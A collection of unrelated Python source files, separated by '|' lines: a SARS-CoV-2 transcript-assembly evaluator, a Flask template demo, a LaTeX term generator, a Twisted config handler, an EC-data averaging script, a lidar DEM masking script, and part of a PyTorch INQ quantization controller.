        self.path_exon_dict = {}
        df = pd.read_csv(fname, sep='\t', header=None, comment='#')
        path_rpkm_dict = {}
        transcript_id = 0
        for _, row in df.iterrows():
            if row[2] == 'transcript':
                key = f"transcript_{transcript_id}"
                transcript_id += 1
                # Attribute column: 'key "value"; key "value"; ...'
                entry_dict = {entry.lstrip(' ').split(' ')[0]: entry.lstrip(' ').split(' ')[-1][1:-1]
                              for entry in row[8].split(';')}
                if 'RPKM' in entry_dict.keys():
                    path_rpkm_dict[key] = float(entry_dict['RPKM'])
                elif 'TPM' in entry_dict.keys():
                    path_rpkm_dict[key] = float(entry_dict['TPM'])
                else:
                    raise Exception(
                        f"TPM or RKPM not found in gtf file in the following row\n {row}")
                self.path_exon_dict[key] = []
            else:
                # Exon row: columns 3/4 are start/end coordinates.
                self.path_exon_dict[key].append((int(row[3]), int(row[4])))
        # Normalize RPKM/TPM values into relative abundances.
        total_rpkm = sum(path_rpkm_dict.values())
        self.path_abundances_dict = {
            key: val / total_rpkm for key, val in path_rpkm_dict.items()}
        # Jumps are the gaps between consecutive exons.
        for key, val in self.path_exon_dict.items():
            self.path_jump_dict[key] = []
            for idx in range(len(val)-1):
                self.path_jump_dict[key].append((val[idx][-1], val[idx+1][0]))
        self.path_length_dict = {}
        for key, exons in self.path_exon_dict.items():
            self.path_length_dict[key] = 0
            for exon in exons:
                self.path_length_dict[key] += exon[1] - exon[0] + 1
    def top_k_jump_dict(self, kdx, length=29903):
        """Jump lists of the kdx paths ranked by abundance*length (dict)."""
        chosen_keys = [key for key, path_jumps in sorted(self.path_jump_dict.items(),
                                                         key=lambda x: (-self.path_abundances_dict[x[0]] * self.path_length_dict[x[0]], -self.path_length_dict[x[0]]))][:kdx]
        return {k: self.path_jump_dict[k] for k in chosen_keys}
    def top_k_jump_list(self, kdx, length=29903):
        """Jump lists of the kdx paths ranked by abundance*length (list)."""
        chosen_keys = [key for key, path_jumps in sorted(self.path_jump_dict.items(),
                                                         key=lambda x: (-self.path_abundances_dict[x[0]] * self.path_length_dict[x[0]], -self.path_length_dict[x[0]]))][:kdx]
        return [self.path_jump_dict[k] for k in chosen_keys]
    def top_k_perc_jump_dict(self, k, length=29903):
        """Like top_k_jump_dict but for the top k percent (at least one).
        (The comprehension variable k shadows the parameter; harmless in
        Python 3 comprehension scope.)"""
        kdx = max(1, math.ceil(len(self.path_jump_dict) * k / 100))
        chosen_keys = [key for key, path_jumps in sorted(self.path_jump_dict.items(),
                                                         key=lambda x: (-self.path_abundances_dict[x[0]] * self.path_length_dict[x[0]], -self.path_length_dict[x[0]]))][:kdx]
        return {k: self.path_jump_dict[k] for k in chosen_keys}
class evaluator():
    """Compares candidate transcript assemblies against a ground truth.

    Parses the ground-truth path file into per-transcript splice jumps,
    exon intervals, relative abundances and lengths (coordinates over
    1..29903), then offers matching and error metrics for registered
    solutions.
    """
    def __init__(self, ground_fname):
        self.read_ground_truth_file(ground_fname)
        self.solutions = {}            # sol_id -> solution
        self.alternate_solutions = {}  # sol_id -> alternate_solution
    def read_ground_truth_file(self, fname):
        """Parse the ground-truth file into jump/exon/abundance/length dicts."""
        self.path_jump_dict = {}
        path_counts = {}
        self.path_exon_dict = {}
        self.path_length_dict = {}
        key = None
        with open(fname, 'r') as inp:
            for line in inp:
                if line.startswith('>'):
                    # Header of the form '>name:count'.
                    key = line.rstrip('\n').split('>')[-1].split(':')[0]
                    if key in self.path_jump_dict.keys():
                        raise Exception(f"repeated entries {key}")
                    else:
                        self.path_jump_dict[key] = []
                        path_counts[key] = float(
                            line.rstrip('\n').split(':')[1])
                else:
                    if not key:
                        raise Exception(f"no identifier found at line: {line}")
                    edgetype = line.rstrip('\n').split('\t')[-1]
                    if edgetype == 'splice':
                        # '[...,left]\t[right,...]\tsplice' -> jump (left, right).
                        left = int(line.split('\t')[0].split(
                            ',')[-1].rstrip(']'))
                        right = int(line.split('\t')[
                            1].split(',')[0].lstrip('['))
                        self.path_jump_dict[key].append((left, right))
        # Exons are the genome intervals between consecutive jumps.
        for key, val in self.path_jump_dict.items():
            self.path_exon_dict[key] = []
            for idx in range(len(val)):
                if idx == 0:
                    self.path_exon_dict[key].append((1, val[idx][0]))
                else:
                    self.path_exon_dict[key].append(
                        (val[idx-1][-1], val[idx][0]))
            if len(val) > 0:
                self.path_exon_dict[key].append((val[-1][-1], 29903))
            else:
                self.path_exon_dict[key].append((1, 29903))
        # Normalize raw counts into relative abundances.
        total_counts = sum(path_counts.values())
        self.path_abundances_dict = {
            key: val / total_counts for key, val in path_counts.items()}
        self.path_length_dict = {}
        for key, exons in self.path_exon_dict.items():
            self.path_length_dict[key] = 0
            for exon in exons:
                self.path_length_dict[key] += exon[1] - exon[0] + 1
    def top_k_jump_dict(self, kdx, length=29903):
        """Jump lists of the kdx paths ranked by abundance*length (dict)."""
        chosen_keys = [key for key, path_jumps in sorted(self.path_jump_dict.items(),
                                                         key=lambda x: (-self.path_abundances_dict[x[0]] * self.path_length_dict[x[0]], -self.path_length_dict[x[0]]))][:kdx]
        return {k: self.path_jump_dict[k] for k in chosen_keys}
    def top_k_jump_list(self, kdx, length=29903):
        """Jump lists of the kdx paths ranked by abundance*length (list)."""
        chosen_keys = [key for key, path_jumps in sorted(self.path_jump_dict.items(),
                                                         key=lambda x: (-self.path_abundances_dict[x[0]] * self.path_length_dict[x[0]], -self.path_length_dict[x[0]]))][:kdx]
        return [self.path_jump_dict[k] for k in chosen_keys]
    def getCaonicalCount(self, ref, tolerance=6):
        """Return (canonical, noncanonical) counts over the ground truth.

        Name keeps its historical misspelling for caller compatibility.
        """
        canonical = 0
        noncanonical = 0
        for key, jumps in self.path_jump_dict.items():
            if evaluator.getORF(ref, jumps, tolerance) == 'non-canonical':
                noncanonical += 1
            else:
                canonical += 1
        return canonical, noncanonical
    @staticmethod
    def getORF(ref, jumps, tolerance=6):
        """Map a single-jump transcript to a canonical sgRNA ORF name.

        *ref* is an indexed reference with pysam-style fetch/references/
        lengths. Returns the ORF name or 'non-canonical'.
        """
        # Genomic start positions of the canonical sgRNA ORFs.
        sgRNAs_from_pos = {
            21562: "S",
            25392: "3a",
            26244: "E",
            26522: "M",
            27201: "6",
            27393: "7a",
            27755: "7b",
            27893: "8",
            28273: "N",
            29557: "10"
        }
        if len(jumps) == 1:
            left_pos = jumps[0][0]
            right_pos = jumps[0][1]
            # First ATG downstream of the jump's right end.
            codon_pos = ref.fetch(
                ref.references[0], right_pos, ref.lengths[0]).find('ATG') + right_pos
            # The leader junction must fall near the TRS-L (positions 55-85).
            if 55 - tolerance <= left_pos <= 85 + tolerance and codon_pos in sgRNAs_from_pos.keys():
                return sgRNAs_from_pos[codon_pos]
            else:
                return 'non-canonical'
        else:
            return 'non-canonical'
    def add_solution(self, sol_id, fname, matching_fname=None):
        """Register a graph-based solution under a fresh *sol_id*."""
        if sol_id not in self.solutions.keys():
            # NOTE(review): self.graph is never assigned in this class --
            # confirm it is set externally before add_solution is called.
            self.solutions[sol_id] = solution(
                self.graph, fname, matching_fname)
        else:
            raise Exception(f"sol_id {sol_id} already exists!")
    def add_alternate_solution(self, sol_id, fname, gtf=False):
        """Register an alternate (jumper/GTF) solution under a fresh id."""
        if sol_id not in self.alternate_solutions.keys():
            self.alternate_solutions[sol_id] = alternate_solution(fname, gtf)
        else:
            raise Exception(f"alternate_sol_id {sol_id} already exists!")
    @staticmethod
    def check_match(source, target, tolerance=10):
        """True if two interval lists match pairwise within *tolerance*."""
        if len(source) == len(target):
            flag = True
            for idx in range(len(source)):
                source_left = source[idx][0]
                source_right = source[idx][1]
                target_left = target[idx][0]
                target_right = target[idx][1]
                if abs(source_left - target_left) > tolerance or abs(source_right - target_right) > tolerance:
                    flag = False
                    break
            return flag
        else:
            return False
    @staticmethod
    def comparedtranscript_abundance(source_dict, source_abundance,
                                     target_dict, target_abundance, tolerance=10):
        """Abundance errors of *source* transcripts against *target* ones.

        Returns (match_error, unmatch_error, squared_residual); match_error
        is currently always 0 (its accumulation is disabled).
        """
        match_error = 0
        unmatch_error = 0
        unmatched_key_set = set(target_dict.keys())
        # Residual abundance per target after subtracting matched sources.
        error_dict = target_abundance.copy()
        for source_key, source_transcript in source_dict.items():
            match_key_list = []
            for target_key, target_transcript in target_dict.items():
                if evaluator.check_match(source_transcript, target_transcript, tolerance):
                    match_key_list.append(target_key)
            nmatches = len(match_key_list)
            if nmatches >= 1:
                # Split the source abundance evenly over all its matches.
                for target_key in match_key_list:
                    error_dict[target_key] -= source_abundance[source_key] / nmatches
                unmatched_key_set = unmatched_key_set.difference(match_key_list)
        for target_key in unmatched_key_set:
            unmatch_error += target_abundance[target_key]**2
        return match_error, unmatch_error, sum([val**2 for val in error_dict.values()])
    @staticmethod
    def unique_transcripts(source_dict, target_dict, tolerance=10):
        """Number of target transcripts matched by at least one source."""
        unmatched_key_set = set(target_dict.keys())
        for source_key, source_transcript in source_dict.items():
            for target_key, target_transcript in target_dict.items():
                if evaluator.check_match(source_transcript, target_transcript, tolerance):
                    unmatched_key_set = unmatched_key_set.difference([
                        target_key])
                    break
        return len(target_dict.keys()) - len(unmatched_key_set)
    @staticmethod
    def unique_canonical_noncanonical_from_jumps(source_dict, target_dict, ref, tolerance=10):
        """(canonical, noncanonical) counts among matched target transcripts."""
        unmatched_key_set = set(target_dict.keys())
        for source_key, source_transcript in source_dict.items():
            for target_key, target_transcript in target_dict.items():
                if evaluator.check_match(source_transcript, target_transcript, tolerance):
                    unmatched_key_set = unmatched_key_set.difference([
                        target_key])
                    break
        canonical_count = 0
        noncanonical_count = 0
        for target_key, target_transcript in target_dict.items():
            if target_key not in unmatched_key_set:
                curr_orf = evaluator.getORF(ref, target_transcript)
                if curr_orf == 'non-canonical':
                    noncanonical_count += 1
                else:
                    canonical_count += 1
        return canonical_count, noncanonical_count
    @staticmethod
    def compare_transcripts(source, target, tolerance=10):
        """Return (true_pos, false_pos) of *source* w.r.t. *target*."""
        true_pos = 0
        false_pos = 0
        for source_transcript in source:
            flag = False
            for target_transcript in target:
                if evaluator.check_match(source_transcript, target_transcript, tolerance):
                    true_pos += 1
                    flag = True
                    break
            if not flag:
                false_pos += 1
        return true_pos, false_pos
    def get_false_negative_exons(self, source, tolerance=10):
        """Count ground-truth exon chains with no match in *source*."""
        false_neg = 0
        for target_transcript in self.path_exon_dict.values():
            flag = False
            for source_transcript in source:
                # Bug fix: check_match is a staticmethod of this class; the
                # original bare call raised NameError at runtime.
                if evaluator.check_match(target_transcript, source_transcript, tolerance):
                    flag = True
                    break
            if not flag:
                false_neg += 1
        return false_neg
|
# Flask demo app: template rendering with variables, conditionals and loops.
from flask import Flask, render_template
app = Flask(__name__)


@app.route('/name/<string:name>', methods=['GET'])
def name(name):
    """Render a page greeting the given name."""
    return render_template('name.html', name=name)


@app.route('/if/<string:name>', methods=['GET'])
def test_if(name):
    """Render the conditional-template demo for the given name."""
    return render_template('if.html', name=name)


@app.route('/stu')
def stu():
    """Render a small hard-coded student roster."""
    students = [
        dict(name='小明', age=14, score=98),
        dict(name='小刚', age=13, score=95),
        dict(name='小红', age=15, score=96),
    ]
    return render_template('stu.html', stu_lst=students)


if __name__ == '__main__':
    app.run(debug=True)
# Python 2 code generator: expands a four-factor product of (L)APW basis
# terms into LaTeX, emitting for each of the 256 terms the name of the
# radial (r_int) and angular (k_int) integral arrays that pair two of the
# four factors.  r3/r4 are evaluated at r, r5/r6 at r'; starred entries are
# complex conjugates.  The strings are LaTeX source, so backslash escapes
# are intentional and must not be "fixed".
r3=["A_{lm_3}^{\kk *}u_{l_3}^*(r)","B_{lm_3}^{\kk^*}\dot{u}_{l_3}^*(r)",\
"C_{lm_3}^{\kk^*}R^{lo*}_{lm_3}(r)","D_{lm_3}^{\kk^*}\dot{R}^{lo*}_{lm_3}(r)"]
r4=["A_{lm_4}^{\kkp}u_{l_4}(r)","B_{lm_4}^{\kkp}\dot{u}_{l_4}(r)",\
"C_{lm_4}^{\kkp}R^{lo}_{lm_4}(r)","D_{lm_4}^{\kkp}\dot{R}^{lo}_{lm_4}(r)"]
r5=["A_{lm_5}^{\kkp *}u_{l_5}^*(r')","B_{lm_5}^{\kkp *}\dot{u}_{l_5}^*(r')",\
"C_{lm_5}^{\kkp^*}R^{lo*}_{lm_5}(r')","D_{lm_5}^{\kkp^*}\dot{R}^{lo*}_{lm_5}(r')"]
r6=["A_{lm_6}^{\kk }u_{l_6}(r')","B_{lm_6}^{\kk}\dot{u}_{l_6}(r')",\
"C_{lm_6}^{\kk}R^{lo}_{lm_6}(r')","D_{lm_6}^{\kk}\dot{R}^{lo}_{lm_6}(r')"]
# nr counts emitted terms (a LaTeX line break is inserted every 3rd term);
# r / rp accumulate the r- and r'-integral references.
nr=0
r,rp="",""
# Pass 1: r_int34[i*4+j] pairs the r3[i] and r4[j] factors of each term.
# (w is rebuilt every iteration; only its membership tests matter here.)
for i in r3:
 for j in r4:
  for k in r5:
   for l in r6:
    w=i+j+k+l+'+'
    if r3[0] in w and r4[0] in w: r+= "r_int34[0],"
    if r3[0] in w and r4[1] in w: r+= "r_int34[1],"
    if r3[0] in w and r4[2] in w: r+= "r_int34[2],"
    if r3[0] in w and r4[3] in w: r+= "r_int34[3],"
    if r3[1] in w and r4[0] in w: r+= "r_int34[4],"
    if r3[1] in w and r4[1] in w: r+= "r_int34[5],"
    if r3[1] in w and r4[2] in w: r+= "r_int34[6],"
    if r3[1] in w and r4[3] in w: r+= "r_int34[7],"
    if r3[2] in w and r4[0] in w: r+= "r_int34[8],"
    if r3[2] in w and r4[1] in w: r+= "r_int34[9],"
    if r3[2] in w and r4[2] in w: r+= "r_int34[10],"
    if r3[2] in w and r4[3] in w: r+= "r_int34[11],"
    if r3[3] in w and r4[0] in w: r+= "r_int34[12],"
    if r3[3] in w and r4[1] in w: r+= "r_int34[13],"
    if r3[3] in w and r4[2] in w: r+= "r_int34[14],"
    if r3[3] in w and r4[3] in w: r+= "r_int34[15],"
    nr+=1
    if nr%3==0:
     w+="\\\ &"
     r+="\\\n"
print r
# Pass 2: r_int56[k*4+l] pairs the r5[k] and r6[l] factors (r' integrals).
for i in r3:
 for j in r4:
  for k in r5:
   for l in r6:
    w=i+j+k+l+'+'
    if r5[0] in w and r6[0] in w: rp+= "r_int56[0],"
    if r5[0] in w and r6[1] in w: rp+= "r_int56[1],"
    if r5[0] in w and r6[2] in w: rp+= "r_int56[2],"
    if r5[0] in w and r6[3] in w: rp+= "r_int56[3],"
    if r5[1] in w and r6[0] in w: rp+= "r_int56[4],"
    if r5[1] in w and r6[1] in w: rp+= "r_int56[5],"
    if r5[1] in w and r6[2] in w: rp+= "r_int56[6],"
    if r5[1] in w and r6[3] in w: rp+= "r_int56[7],"
    if r5[2] in w and r6[0] in w: rp+= "r_int56[8],"
    if r5[2] in w and r6[1] in w: rp+= "r_int56[9],"
    if r5[2] in w and r6[2] in w: rp+= "r_int56[10],"
    if r5[2] in w and r6[3] in w: rp+= "r_int56[11],"
    if r5[3] in w and r6[0] in w: rp+= "r_int56[12],"
    if r5[3] in w and r6[1] in w: rp+= "r_int56[13],"
    if r5[3] in w and r6[2] in w: rp+= "r_int56[14],"
    if r5[3] in w and r6[3] in w: rp+= "r_int56[15],"
    nr+=1
    if nr%3==0:
     w+="\\\ &"
     rp+="\\\n"
print rp
# Pass 3: k_int36[i*4+l] pairs the r3[i] and r6[l] factors.
kk=""
for i in r3:
 for j in r4:
  for k in r5:
   for l in r6:
    w=i+j+k+l+'+'
    if r3[0] in w and r6[0] in w: kk+= "k_int36[0],"
    if r3[0] in w and r6[1] in w: kk+= "k_int36[1],"
    if r3[0] in w and r6[2] in w: kk+= "k_int36[2],"
    if r3[0] in w and r6[3] in w: kk+= "k_int36[3],"
    if r3[1] in w and r6[0] in w: kk+= "k_int36[4],"
    if r3[1] in w and r6[1] in w: kk+= "k_int36[5],"
    if r3[1] in w and r6[2] in w: kk+= "k_int36[6],"
    if r3[1] in w and r6[3] in w: kk+= "k_int36[7],"
    if r3[2] in w and r6[0] in w: kk+= "k_int36[8],"
    if r3[2] in w and r6[1] in w: kk+= "k_int36[9],"
    if r3[2] in w and r6[2] in w: kk+= "k_int36[10],"
    if r3[2] in w and r6[3] in w: kk+= "k_int36[11],"
    if r3[3] in w and r6[0] in w: kk+= "k_int36[12],"
    if r3[3] in w and r6[1] in w: kk+= "k_int36[13],"
    if r3[3] in w and r6[2] in w: kk+= "k_int36[14],"
    if r3[3] in w and r6[3] in w: kk+= "k_int36[15],"
    nr+=1
    if nr%3==0:
     w+="\\\ &"
     kk+="\\\n"
print kk
# Pass 4: k_int45[j*4+k] pairs the r4[j] and r5[k] factors.
kp=""
for i in r3:
 for j in r4:
  for k in r5:
   for l in r6:
    w=i+j+k+l+'+'
    if r4[0] in w and r5[0] in w: kp+= "k_int45[0],"
    if r4[0] in w and r5[1] in w: kp+= "k_int45[1],"
    if r4[0] in w and r5[2] in w: kp+= "k_int45[2],"
    if r4[0] in w and r5[3] in w: kp+= "k_int45[3],"
    if r4[1] in w and r5[0] in w: kp+= "k_int45[4],"
    if r4[1] in w and r5[1] in w: kp+= "k_int45[5],"
    if r4[1] in w and r5[2] in w: kp+= "k_int45[6],"
    if r4[1] in w and r5[3] in w: kp+= "k_int45[7],"
    if r4[2] in w and r5[0] in w: kp+= "k_int45[8],"
    if r4[2] in w and r5[1] in w: kp+= "k_int45[9],"
    if r4[2] in w and r5[2] in w: kp+= "k_int45[10],"
    if r4[2] in w and r5[3] in w: kp+= "k_int45[11],"
    if r4[3] in w and r5[0] in w: kp+= "k_int45[12],"
    if r4[3] in w and r5[1] in w: kp+= "k_int45[13],"
    if r4[3] in w and r5[2] in w: kp+= "k_int45[14],"
    if r4[3] in w and r5[3] in w: kp+= "k_int45[15],"
    nr+=1
    if nr%3==0:
     w+="\\\ &"
     kp+="\\\n"
print kp
|
from twisted.internet import defer
from igs_tx.utils import defer_utils
from igs_tx.utils import defer_pipe
from vappio_tx.utils import queue
@defer_utils.timeIt
@defer.inlineCallbacks
def handleConfig(request):
    """
    Returns the config for a single cluster in the system.
    Throws an error if the cluster is not found.
    Input:
    { cluster_name : string
      user_name : string
    }
    Output:
    config - keyvalues
    """
    persistManager = request.state.persistManager
    # NOTE(review): the [0] is applied to the object returned by
    # loadCluster() *before* the yield resolves it; this only works if
    # loadCluster returns something indexable (e.g. a list of deferreds),
    # not a bare Deferred -- confirm against its definition.
    cluster = yield persistManager.loadCluster(request.body['cluster_name'],
                                               request.body['user_name'])[0]
    # Serialize the cluster and answer with just its 'config' section.
    clusterDict = persistManager.clusterToDict(cluster)
    defer.returnValue(request.update(response=clusterDict['config']))
def subscribe(mq, state):
    """Wire handleConfig up to the clusters config queue on *mq*."""
    # Validate the required body keys before producing the config response.
    processPipe = defer_pipe.pipe([queue.keysInBody(['user_name',
                                                     'cluster_name']),
                                   handleConfig])
    processClusterConfig = queue.returnResponse(processPipe)
    # Queue name and concurrency level both come from configuration.
    queue.subscribe(mq,
                    state.conf('clusters.config_www'),
                    state.conf('clusters.concurrent_config'),
                    queue.wrapRequestHandler(state, processClusterConfig))
|
#! /usr/bin/env python3
# 2017.5.23.
def add_name_dict(namedict, resnumber, resname, restype):
    """Register *resname*/*restype* for *resnumber* in the residue name dict.

    namedict maps resnumber -> (resname, [restype, ...]),
    e.g. {1: ('ALA', ['Main', 'Side'])}.
    """
    # Direct membership test on the dict (no .keys() needed).
    if resnumber not in namedict:
        namedict[resnumber] = (resname, [restype])
    else:
        known_types = namedict[resnumber][1]
        if restype not in known_types:
            known_types.append(restype)
            # Re-store under the (possibly updated) residue name, matching
            # the original behavior of refreshing resname on a new type.
            namedict[resnumber] = (resname, known_types)
def add_value_dict(valuedict, resid1, resid2, ecvalue):
    """Append *ecvalue* to the list kept for the (resid1, resid2) pair.

    valuedict maps (resid1, resid2) -> [value, ...].
    """
    # setdefault replaces the hand-rolled membership test / double lookup.
    valuedict.setdefault((resid1, resid2), []).append(ecvalue)
def gen_line_data(filename):
    """Yield (res1, res2, value) triples from each line of *filename*.

    Exits the program with a message if the file cannot be opened.
    """
    try:
        f = open(filename, 'r')
    except OSError:
        # Only file-system errors should abort; the original bare except
        # also hid programming errors.
        print("Can't Open file : {0}".format(filename))
        raise SystemExit
    # Context manager guarantees the handle is closed even if the
    # consumer abandons the generator early.
    with f:
        for line in f:
            fields = line.split()
            yield fields[0], fields[1], float(fields[2])
def resid_converter(resid):
    """Parse 'NNNNN_NAME' or 'NNNNN_NAME-TYPE' into (number, name, type).

    Examples: '00012_ALA' -> (12, 'ALA', None);
              '00004_GLU-Side' -> (4, 'GLU', 'Side').
    """
    pieces = resid.split('_')
    resnumber = int(pieces[0])
    label = pieces[1]
    restype = None
    if '-' in label:
        # A dash separates the residue name from its type suffix.
        sub = label.split('-')
        restype = sub[-1]
        label = sub[0]
    return resnumber, label, restype
def input_data(file_list):
    """Read every EC data file and build the name and value dictionaries.

    Returns (name_dict, ec_dict) as filled by add_name_dict/add_value_dict.
    """
    name_dict = {}
    ec_dict = {}
    print("data file")
    for filenumber, filename in enumerate(file_list):
        # Each line contributes two residue registrations and one EC value.
        for res1, res2, value in gen_line_data(filename):
            num_a, name_a, type_a = resid_converter(res1)
            num_b, name_b, type_b = resid_converter(res2)
            add_name_dict(name_dict, num_a, name_a, type_a)
            add_name_dict(name_dict, num_b, name_b, type_b)
            add_value_dict(ec_dict, (num_a, type_a), (num_b, type_b), value)
        print("{0:0>3} : {1}".format(filenumber, filename))
    return name_dict, ec_dict
def calc_data(value_list, value_number):
    """Return (mean, standard deviation) of *value_list* over
    *value_number* samples."""
    import math
    value_sum = sum(value_list)
    value_sqr = sum(v * v for v in value_list)
    value_avg = value_sum / value_number
    mean_sqr = value_sqr / value_number
    # Clamp tiny negative variances caused by floating-point round-off so
    # math.sqrt cannot raise ValueError on near-constant data.
    value_var = max(mean_sqr - value_avg ** 2, 0.0)
    value_dev = math.sqrt(value_var)
    return value_avg, value_dev
def gen_output_name(resnumber, resname, restype):
    """Format a residue id as 'NNNNN_NAME' or 'NNNNN_NAME-TYPE'."""
    # `is None` (identity) instead of `== None` (equality).
    if restype is None:
        return "{0:0>5}_{1}".format(resnumber, resname)
    return "{0:0>5}_{1}".format(resnumber, resname + '-' + restype)
def gen_output_line(name_dict, ec_dict, value_number):
    """Yield one formatted output line per residue pair that has EC data.

    Pairs are emitted in ascending residue-number order, each line holding
    both residue ids, the mean and the standard deviation of the values.
    """
    ordered_ids = sorted(name_dict)
    for pos, num_a in enumerate(ordered_ids):
        name_a, types_a = name_dict[num_a]
        # Only partner with strictly larger residue numbers (upper triangle).
        partners = ordered_ids[pos + 1:]
        for type_a in types_a:
            for num_b in partners:
                name_b, types_b = name_dict[num_b]
                for type_b in types_b:
                    pair = ((num_a, type_a), (num_b, type_b))
                    if pair not in ec_dict:
                        continue
                    avg, dev = calc_data(ec_dict[pair], value_number)
                    id_a = gen_output_name(num_a, name_a, type_a)
                    id_b = gen_output_name(num_b, name_b, type_b)
                    yield " {0} {1} {2} {3}\n".format(id_a, id_b, avg, dev)
def main():
    """Average the EC value files named on the command line into
    ec_average.dat."""
    import sys
    if len(sys.argv) == 1:
        print('USAGE : ./average.py [ec data files ..]')
        exit()
    # Every input file contributes one sample per residue pair.
    data_files = sys.argv[1:]
    sample_count = len(data_files)
    avg_file = 'ec_average.dat'
    name_dict, ec_dict = input_data(data_files)
    # Stream the averaged lines straight to the output file.
    with open(avg_file, 'w') as out:
        for outputline in gen_output_line(name_dict, ec_dict, sample_count):
            out.write(outputline)
# Run the averaging tool only when executed as a script.
if __name__ == '__main__':
    main()
|
import argparse
import os
import gdal
from basin_data import BASINS_BOUNDARIES, BASIN_EPSG
from pdal_pipeline import PdalPipeline
LAZ_TO_DEM_OUTFILE = '{0}_masked_1m.tif'
DEM_COMPRESSED_OUTFILE = '{0}_masked_1m_c.tif'
SAVE_MESSAGE = 'Saved output to:\n {0}\n'
parser = argparse.ArgumentParser()
parser.add_argument(
'--sfm-laz',
type=argparse.FileType('r'),
help='Path to lidar point cloud',
required=True
)
parser.add_argument(
'--casi-mask',
type=argparse.FileType('r'),
help='Path to CASI mask',
required=True
)
parser.add_argument(
'--envi-mask',
type=argparse.FileType('r'),
help='Path to ENVI mask',
required=True
)
parser.add_argument(
'--basin',
type=str,
choices=BASINS_BOUNDARIES.keys(),
help='String to indicate basin. Will select boundary info and EPSG codes',
required=True
)
if __name__ == '__main__':
    arguments = parser.parse_args()
    # Derive the output base name from the input .laz file.
    # NOTE(review): os.path.splitext() already keeps the directory part, so
    # joining the dirname again duplicates it for relative paths -- confirm
    # callers pass absolute paths.
    output_file = os.path.splitext(arguments.sfm_laz.name)[0]
    output_file = os.path.join(
        os.path.dirname(arguments.sfm_laz.name), output_file
    )
    print('Creating DEM')
    dem_pipeline = PdalPipeline(arguments.sfm_laz.name)
    print('Masking out vegetation')
    # Drop vegetation returns flagged by the CASI and ENVI masks, then
    # rasterize to a 1 m DEM clipped to the basin boundary/EPSG.
    dem_pipeline.add(PdalPipeline.mask_casi(arguments.casi_mask.name))
    dem_pipeline.add(PdalPipeline.mask_envi(arguments.envi_mask.name))
    dem_pipeline.add(PdalPipeline.create_dem(
        outfile=LAZ_TO_DEM_OUTFILE.format(output_file),
        bounds=BASINS_BOUNDARIES[arguments.basin],
        epsg=BASIN_EPSG[arguments.basin]
    ))
    # NOTE(review): duplicate of the 'Creating DEM' message above --
    # probably meant to say 'Executing pipeline'; confirm intended wording.
    print('Creating DEM')
    dem_pipeline.execute()
    # Release PDAL resources before the GDAL step.
    del dem_pipeline
    print(SAVE_MESSAGE.format(LAZ_TO_DEM_OUTFILE.format(output_file)))
    print('Compressing tif')
    # Rewrite the DEM as a tiled, LZW-compressed GeoTIFF.
    gdal.Translate(
        DEM_COMPRESSED_OUTFILE.format(output_file),
        gdal.Open(LAZ_TO_DEM_OUTFILE.format(output_file), gdal.GA_ReadOnly),
        creationOptions=["COMPRESS=LZW", "TILED=YES",
                         "BIGTIFF=IF_SAFER", "NUM_THREADS=ALL_CPUS"]
    )
    print(SAVE_MESSAGE.format(DEM_COMPRESSED_OUTFILE.format(output_file)))
|
# Copyright (c) 2019 ETH Zurich, Lukas Cavigelli
import math
import itertools
import torch
import torch.nn as nn
import quantlab.indiv as indiv
class INQController(indiv.Controller):
    """Instantiate typically once per network, provide it with a list of INQ
    modules to control and an INQ schedule, and insert a call to the step
    function once per epoch."""
    def __init__(self, modules, schedule, clearOptimStateOnStep=False,
                 stepEveryEpoch=False, rescaleWeights=False):
        super().__init__()
        self.modules = modules
        # JSON schedules arrive with string keys; normalize them to ints.
        self.schedule = {int(k): v for k, v in schedule.items()}  # epoch -> fraction
        self.clearOptimStateOnStep = clearOptimStateOnStep
        self.fraction = 0.0
        self.stepEveryEpoch = stepEveryEpoch
        self.rescaleWeights = rescaleWeights

    def step_preTraining(self, epoch, optimizer=None, tensorboardWriter=None):
        """Advance the quantized fraction per the schedule and re-step modules."""
        if epoch in self.schedule:
            self.fraction = self.schedule[epoch]
        elif not self.stepEveryEpoch:
            # No schedule entry and per-epoch stepping disabled: nothing to do.
            return
        # Log the active fraction to TensorBoard, if a writer is given.
        # (identity check: `is not None` instead of `!= None`)
        if tensorboardWriter is not None:
            tensorboardWriter.add_scalar('INQ/fraction',
                                         self.fraction, global_step=epoch)
        # Re-quantize each controlled module at the new fraction.
        for m in self.modules:
            m.step(self.fraction)
        # Clear optimizer state (e.g. Adam's momentum): stale statistics must
        # not keep moving freshly frozen weights.
        if self.clearOptimStateOnStep and optimizer is not None:
            optimizer.state.clear()

    def step_postOptimStep(self, *args, **kwargs):
        """Optionally rescale full-precision weights after each optimizer step."""
        if self.rescaleWeights:
            for m in self.modules:
                m.weightInqCtrl.rescaleWeights()

    @staticmethod
    def getInqModules(net):
        """Return all INQ-capable modules contained in *net*."""
        return [m
                for m in net.modules()
                if isinstance(m, (INQLinear, INQConv1d, INQConv2d))]
class INQParameterController:
    """Implements INQ for a single parameter of a module (e.g. INQConv2d's
    weight).

    Registers two companion, non-trainable parameters on the module: a
    'frozen' tensor holding quantized values (NaN marks entries still
    trained at full precision) and a one-element scale parameter s.
    """
    def __init__(self, module, parameterName, numLevels=3,
                 strategy="magnitude", backCompat=True,
                 quantInitMethod=None):  # quantInitMethod e.g. 'uniform-l1opt'
        self.module = module
        self.parameterName = parameterName
        self.backCompat = backCompat
        self.numLevels = numLevels
        # "magnitude" or "random" or "magnitude-SRQ"/"RPR"
        self.strategy = strategy
        self.fraction = 0.0  # fraction of weights currently frozen
        self.quantInitMethod = quantInitMethod
        if self.backCompat:
            # Legacy field names; only valid for a single 'weight' parameter.
            assert(parameterName == 'weight')
            assert(not hasattr(module, 'weightFrozen'))
            assert(not hasattr(module, 'sParam'))
            self.pnameFrozen = 'weightFrozen'
            self.pnameS = 'sParam'
        else:
            # More structured; adds support for multiple indep. INQ parameters.
            self.pnameFrozen = parameterName + '_inqFrozen'
            self.pnameS = parameterName + '_inqS'
        # All-NaN frozen tensor: nothing is quantized yet.
        module.__setattr__(self.pnameFrozen,
                           nn.Parameter(torch.full_like(self.weight, float('NaN')),
                                        requires_grad=False))
        module.__setattr__(self.pnameS,
                           nn.Parameter(torch.full((1,), float('NaN')).to(self.weight),
                                        requires_grad=False))

    def getWeightParams(self, module):
        """Fetch (weight, weightFrozen) from *module* (a replica may be
        passed instead of self.module; see inqAssembleWeight)."""
        weight = module.__getattr__(self.parameterName)
        weightFrozen = module.__getattr__(self.pnameFrozen)
        return weight, weightFrozen

    @property
    def weight(self):
        return self.module.__getattr__(self.parameterName)

    @property
    def weightFrozen(self):
        return self.module.__getattr__(self.pnameFrozen)

    @property
    def sParam(self):
